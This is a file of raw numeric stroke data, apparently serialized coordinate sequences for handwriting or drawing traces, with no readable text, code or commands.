0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,1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1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6 280,'0'0'1692,"0"-6"2889,0 12-4545,0 0-36,0 6-72,0-6-164,0 6-252,0-5-421,-10-1-667,10 6-392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2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1 644,'11'18'5420,"-11"-10"-4845,1-3-364,-1 0 1,0-1 0,0 1-1,-1 0 1,1 0-1,-1 0 1,0-1-1,0 1 1,-1 0 0,-2 4-1,2-4-81,0-1 0,0 1 1,1 0-1,-1-1 0,1 1 0,0 0 0,1 0 0,-1 7 1,-7 2 351,4-7 888,14-11-391,2-20-143,53-53-496,-54 66-238,17-13 500,-27 23-583,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,1-1 1,-1 1-1,1 0 1,-1 0-1,0-1 0,1 1 1,-1 0-1,1 0 1,-1 1-1,1-1 1,-1 0-1,0 0 1,1 1-1,-1-1 1,0 1-1,1-1 1,1 2-1,-1 1-7,1 1 1,-1-1-1,1 1 0,-1 0 0,0 0 1,-1 0-1,1 0 0,1 5 1,2 5-6,12 36-1261,-14-25-8035,-3-15 6050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4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0 106 476,'0'0'2582,"11"7"-100,-11-5-2360,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,0 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,2 3-1,-2-2-46,0 1-1,0 0 1,0 0-1,-1 0 0,0 0 1,1 0-1,-1 0 1,-1 0-1,0 7 1,0 3 205,1 15 143,1-12-348,-1 0 1,-1 1-1,0-1 1,-7 31 0,7-42-69,0 0 0,1 0 0,-1 0 0,1 0 0,1 0 0,-1 1 0,1-1 0,3 12 0,2 23 50,-6-40 483,11-19 510,-1-19-328,-3 0-63,-6 32-635,0 1 0,0 0-1,0-1 1,0 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,-1-1 0,1 1 0,-3-9 0,1 3-21,-1 0 0,1-1 0,1 1 0,0-1 0,1 1 1,0-1-1,0 1 0,1-1 0,0 1 0,1-1 0,3-10 0,-1 0 16,-4 20-16,1-1 0,-1 0 0,0 1 0,0-1-1,1 0 1,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,2-4 0,7-14 118,-9 16-88,1 0-1,-1 0 0,1 0 0,-1 0 1,1 0-1,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,3-2 0,-2 2 9,15-12 120,1 0-1,35-17 1,-50 29-164,0 0 1,0 0 0,0 0-1,1 1 1,-1-1 0,1 1-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 1 0,0 0-1,-1 0 1,1 1 0,0-1 0,-1 1-1,1 0 1,-1 0 0,9 4-1,-12-4 1,0-1-1,1 1 1,-1-1 0,0 1-1,0 0 1,0-1 0,0 1-1,-1 0 1,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 0-1,-1 0 1,0 0-1,1 1 1,-1-1 0,0 0-1,1 0 1,-1 0 0,0 1-1,0-1 1,0 0-1,0 0 1,-1 2 0,-16 34-27,5-14 29,8-18 2,1 1 0,-1-1 0,0 0 0,-1-1 1,1 1-1,-1-1 0,0 0 0,0 0 1,0 0-1,-6 3 0,-30 25 43,8-5 83,31-26-88,0 0-1,0 0 1,0 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,1 1-1,-1 0 0,1 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 1-1,1-1 1,-1 0-1,1 0 0,0 0 1,0 1-1,0 2 0,0-1-34,1-1 1,-1 1-1,1 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 0 0,0 1 0,3 2 1,9 17-16,-11-19 13,0 0 0,1 0 0,-1 0 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 0 0,1 0 0,0 0 0,9 2 0,22 11 32,-16-4-116,-14-8-21,0-1-1,0 2 0,-1-1 0,1 0 1,-1 1-1,0 0 0,0 1 0,0-1 1,0 1-1,-1 0 0,6 8 0,-4-4-1082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4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1 122 1284,'24'-4'4548,"7"-10"-2803,0 1-1483,-21 9-199,1 0 0,-1-1 1,-1 0-1,1 0 0,16-13 0,4-2 718,-30 20-744,1-1 0,-1 1-1,0 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1-1,1-1 1,-1 1-1,0-1 1,0 1 0,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,0 0-1,0-1 1,-1 1-1,1-1 1,0 1 0,0-1-1,0 1 1,-1 0-1,1-1 1,0 1-1,0 0 1,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,-1 0-1,0-1 1,-19-10 1018,15 11-987,0 1 0,-1 0 0,1 0 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1 0,-1 0 0,0 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-6 8 1,-7 20 383,12-27-371,1 0-1,0 0 1,1 1 0,-1-1-1,1 1 1,0 0-1,1-1 1,-1 1-1,1 0 1,0 0-1,0 10 1,1-10-68,0 0 0,0-1 0,0 1 0,1 0 0,0-1 0,0 1 1,1-1-1,-1 1 0,1-1 0,5 10 0,-5-12-13,0-1-1,1 1 1,-1 0 0,1-1 0,-1 0-1,1 1 1,0-1 0,0 0 0,0-1-1,1 1 1,-1 0 0,0-1 0,0 0-1,1 0 1,-1 0 0,1 0 0,5 0-1,30 10-88,12 1-1905,-47-12 1432,0 0 0,0 0 0,0 0 0,0-1-1,0 0 1,0 1 0,0-1 0,0 0-1,-1-1 1,1 1 0,6-4 0,8-6-2343,-5 4 72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13 1092,'-13'-7'3406,"10"6"-3213,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0-1,0 0 1,0 1 0,-6 2 0,8-3-175,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 1,1 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,1 0 0,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,1 1-1,7 5-56,-1 0 1,1 0-1,17 9 0,16 14 119,-21-16-85,-8-4 59,-13-10-49,1 1-1,-1-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 1,0-1-1,-1 0 1,1 0-1,-1 1 1,-3 13 559,4-14-534,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,-6 4 133,0 0-1,0 0 1,0-1-1,0 0 1,0-1 0,-1 1-1,1-1 1,-1-1 0,0 1-1,1-1 1,-10 0-1,-3-2-140,15 0-28,0 1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 1-1,0 0 1,0 0 0,-6 3-1,9-3-6,2 9-388,2 12-811,9-11-6312,-2-6 4717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89 104,'11'7'4721,"-2"14"-2548,-7-19-2105,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,-1 1 0,1 2 0,0 29 505,0-14-447,-1-1-1,-1 0 1,0 0 0,-8 33-1,6-38-113,0 0 0,0 0 0,2 0 0,-1 20 0,2-33 17,2-43 43,0 34-70,1 0-1,-1-1 1,-1 1 0,1 0 0,-1-11-1,6-25 4,1-10-28,-7 44 13,0 0 1,1 0 0,0 0 0,0 0 0,1 0-1,0 0 1,9-17 0,-6 19 6,0 0 0,1 0 0,0 0 0,0 0 0,1 1 0,0 1-1,0-1 1,1 1 0,0 1 0,0 0 0,0 0 0,0 0 0,18-5 0,4 5 0,-31 6 15,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,-1 1-1,1-1 1,0 0 0,0 1 0,0-1-1,-1 0 1,1 0 0,0 1 0,-1-1-1,1 0 1,0 0 0,-1 1 0,1-1-1,0 0 1,-1 0 0,-16 17 433,8-12-412,0 0 1,1 1 0,0 0-1,0 0 1,0 1-1,1 0 1,0 0-1,0 1 1,1 0-1,0 0 1,-8 15 0,-23 24-3648,31-40 1301,-3-1-220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1 140,'0'0'6613,"11"0"-6085,-11 6-416,10-6-64,-10 6-76,11-6-172,-11 6-292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8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575 55 1128,'-8'-4'13193,"3"3"-12574,-21 0 1474,25 1-2041,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 0 0,0 1 1,0-1-1,1 0 0,-1 0 0,0 0 0,-1-1 1,-28-6 626,26 6-552,4 2-110,-1 0 0,1 0 1,-1 0-1,1-1 0,-1 1 0,1 0 1,-1-1-1,1 1 0,-1 0 0,1-1 1,0 1-1,-1 0 0,1-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-2 0,-45 0 782,41 0-762,0 0 1,-1 1 0,1-1-1,-1 1 1,0 0 0,1 0-1,-1 1 1,0-1 0,-4 1-1,7 0 13,0 0-9,-1 0 0,0-1 0,1 2 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1-1,-4 3 1,-44-3 493,-17 23-435,64-22-96,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,1 0 0,-1 0 0,-5 5 0,-12 9 11,19-16-13,1 0 1,-1 0-1,0 0 1,1 0-1,-1 1 0,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1 0 0,-1-1 1,1 1-1,0 0 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 0,1 0 1,-1 0-1,0 0 0,0-1-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-2 0 81,-22 23 202,21-21-274,2-2-8,1 0-1,0 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,-1 0 1,1 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 0-1,0 1 1,-1-1-1,1 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-11 8-3,9-9 2,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,-10 19 25,15-4-4,-7-13-35,-7 2 7,9-3 2,-1 0 0,1 0 0,0 0-1,-1 1 1,1-1 0,0 0 0,1 1 0,-1-1-1,0 0 1,1 1 0,-1-1 0,1 5 0,-13 18 121,6-5-122,7-19 7,-1 0-1,1 1 0,0-1 1,0 1-1,-1-1 1,1 0-1,-1 1 0,1-1 1,-1 0-1,0 0 0,1 1 1,-1-1-1,0 0 1,0 0-1,-2 2 0,3-3 1,-1 1 0,1-1-1,0 1 1,0-1-1,-1 0 1,1 1 0,0-1-1,0 1 1,-1-1-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1-1,0-1 1,0 1 0,0-1-1,0 1 1,1 0-1,-2 10-1,0-10 0,0-1-1,0 1 1,0-1 0,1 1 0,-1 0 0,0-1 0,1 1-1,-1 0 1,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,-1-1 0,1 1-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1 8-4,-12 28 12,11-36-5,0-1-1,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1-1 0,2 1 0,1 21 6,-2-21-7,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,-3 21-5,4-21 0,-2 11 18,1-11-13,-1 0-1,1 0 0,0 0 1,0 1-1,1-1 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,1 1-1,-1-1 1,1 1-1,0-1 0,0 1 1,0-1-1,-1 1 0,1 0 1,1-1-1,-1 1 0,0-1 1,0 1-1,0-1 1,1 1-1,-1-1 0,1 1 1,-1-1-1,1 1 0,0-1 1,0 0-1,1 3 0,5 14 4,-3-5 26,-3-12-29,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,-1 2 0,34 28 64,-28-23-48,-5-8-16,0 1 0,1-1 1,-1 0-1,0 0 0,1 0 1,-1 1-1,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,1 1-1,-1-1 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 1 1,2 1 1,1 1 1,-1-1-1,0 0 1,1 0 0,-1-1-1,1 1 1,-1 0-1,1 0 1,0-1-1,0 1 1,0-1 0,0 0-1,0 1 1,0-1-1,3 1 1,-4-1 6,1 0 10,32 18-236,-32-18 245,1 1 0,-1-1 1,1 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1-1-1,6 0 0,-2 2 33,22 2-56,-10-3-45,-12-1 50,0 1-1,0-1 1,0 0 0,0-1 0,0 0 0,0 0 0,10-3-1,58-8-5,-6 6 11,7-31-2,-55 30-19,21-18-1,-38 18 7,-2 4 0,28-10 35,24-41-53,-49 36 60,-2 16-38,0 1-1,-1-1 0,1 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,1-2 0,10-15-91,-1-28 84,-6 41 15,-3 6-10,0 0-1,-1 1 0,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,0 1 0,1-1 1,-1 0-1,0 0 0,0 0 0,0 0 1,0-1-1,11-41-7,-12 34 6,1 7 1,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1 0,0 0-1,0 0 1,0 1 0,1-1-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,0 1 0,0-1-1,2-1 1,-2-2 2,1-1 0,-2 1-1,1-1 1,0 1 0,-1-1 0,0 1-1,0-1 1,-2-9 0,1 1-2,-10-16 23,6 12-389,-1-8 736,2 19-361,3 7-9,1-1 1,-1 1-1,1 0 0,0 0 0,-1-1 1,1 1-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1-1 0,1 1 1,0-1-1,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,0-2-1,-1 1 3,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,-1-1-1,1 1 1,-1 0-1,1-2 1,-1 3-4,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,-1-1 0,1 1 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,-1 0 0,1-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,-10-19-9,7 15 43,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-10-4 0,-18-9 210,29 14-209,0 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 1 0,0-1-1,1 1 1,0 0 0,-5 1 0,-3 1-409,0 1-1,0 1 1,-17 9-1,-35 22-5246,18-19-5923,35-16 7940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12 312,'0'0'181,"0"0"1,0-1-1,0 1 0,0-1 0,-1 1 1,1 0-1,0-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,0 0 0,-1 0 1,1-1-1,0 1 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 1,1 1-104,-1-1 1,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0-139,2-1-1811,-2 0 1689,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0-5-1989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0 140,'0'0'3572,"-2"9"2730,-5 2-5614,4 5 65,-26 14-357,27-26-601,-5 7-76,4-11-375,2-8-703,1-6-4199,0-2 3050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 68,'11'-6'4828,"-13"35"-3424,1-29-1388,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 1 0,0 0-2,-13 23 417,-5 5-1,17-29-398,20-37-5230,-17 29 3102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0 112,'0'0'1355,"9"0"-243,-10 1-910,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 0 1,-1 0-1,1 0 1,1 3-1,33 4 1242,-31-7-1382,0 0 0,1 0 1,-1 0-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,3-2 0,-3 1-33,-1 0-1,1 0 0,-1 0 1,0 0-1,1 1 0,-1-1 1,0 1-1,7 2 0,-6-2-99,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0-1,6-3 1,23-13-4546,-31 11 2296,-2 0-163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6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36,'10'-17'5902,"-11"19"-5941,0-2 406,0 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0 1 394,1 10 2336,3-12-3011,-3 0-72,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1-1-1,-1 1 1,0-1-1,0 0 1,1 1-1,30 13 506,-10-5-343,-19-7-168,0 0 1,1-1-1,-1 1 0,1-1 0,0 0 0,-1 0 1,1 0-1,0 0 0,0 0 0,-1 0 0,6 0 1,7-1 25,-4-1 21,0 1 1,1 1-1,-1 0 1,14 3-1,-3-3-35,-21-2-17,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,1 1 0,32 5 154,58-7 3,-91 0-164,17 4 71,0-1 0,0 0 0,33-1 0,-1-2-161,-50 0 78,44-6 145,-35 6-120,-6-1-10,0 1 0,1-1 1,-1 1-1,0 0 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,7 3 0,34-3 115,20-1-95,-15 0-350,-48 0 303,4 3 86,1-1 0,0 0 0,0 0 0,0-1-1,11 1 1,-16-2-26,-1 1-34,0 0-1,0 0 1,1 0-1,-1-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1 1 1,-1-1-1,1 0 1,-1 0-1,1-1 1,-1 1-1,4-1 0,7 1-12,17 7 12,15-2 79,-41-1-36,-2-3-40,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 1,1 0-1,-1 0 0,1 0 0,1 1 0,26 5 271,-26-6-117,32-6 1338,-21 3-1204,-38 0-1624,-27-7-7072,18 2 2507,12 7 2165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9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11 322 112,'0'0'3784,"-11"5"-1543,11-10 717,1-8 1672,7 1-4241,7-23-349,-3 19-62,-3 1 22,-2 10-1,-5 4 3,-1-2 26,-1 1 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1-1 0,0 0 0,2-2 0,-1-13 329,1 16-335,-3 0-19,-1 1 1,0 0 0,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1-1-1,0 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1 0,0 0-1,0-1 1,-1 0-1,21-16 231,5-18 97,4 10 435,-27 24-688,1-2-56,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,8-3 1,-10 5-4,3-9 90,-5 10-107,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,1 0 1,-1 0-1,0 0 0,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,1-1 0,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0-1 1,1 1-1,-1 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 0,0 0 1,0 0-1,0 1 1,1-1-1,6-3 69,0 1 0,0 0 0,0 1-1,0 0 1,10-1 0,15-16 96,-21 13-78,10-2-51,-19 7-26,29 11-5,-29-10 11,-2-1 1,-1 3-16,11 5 29,-9-7-15,1-1-5,0 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,-1 0 0,1-1 1,0 1-1,-1 0 0,4 2 0,0 0-48,-3-2 52,0 0-2,1 0 1,-1 1-1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 0,1 2 0,19 8 79,21 7 320,-44-18-411,11 1 4,-9-3 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1-1,0 0 1,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,-1 0 0,1 2 0,-1-2-5,11 6 27,-3 2 14,-7-9-40,0 1 0,0-1 1,0 1-1,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 1,0 0-1,-1-1 0,1 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 2 0,3 2 19,-3-5-18,-1 1 0,1-1-1,-1 0 1,0 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 1 1,0-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1-1,0-1 1,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1-1,0-1 1,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,-1 3 9,1-2-10,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2 1 0,-3-3-2,1 1 0,-1-1 1,0 1-1,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 1,-1 1-1,1-1 0,0 0 0,-1 1 0,1-1 0,-1 1 0,-5 9 50,6-9-46,0-1-5,0 0 1,0 0 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-9 11 10,7-10-7,-3 14 20,4-14-22,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0 0 1,-1 0-1,1-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0-1 0,1 2 0,-1 51 310,0-52-233,1-13 18,0 12-162,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0-1,1 0 1,-1 0 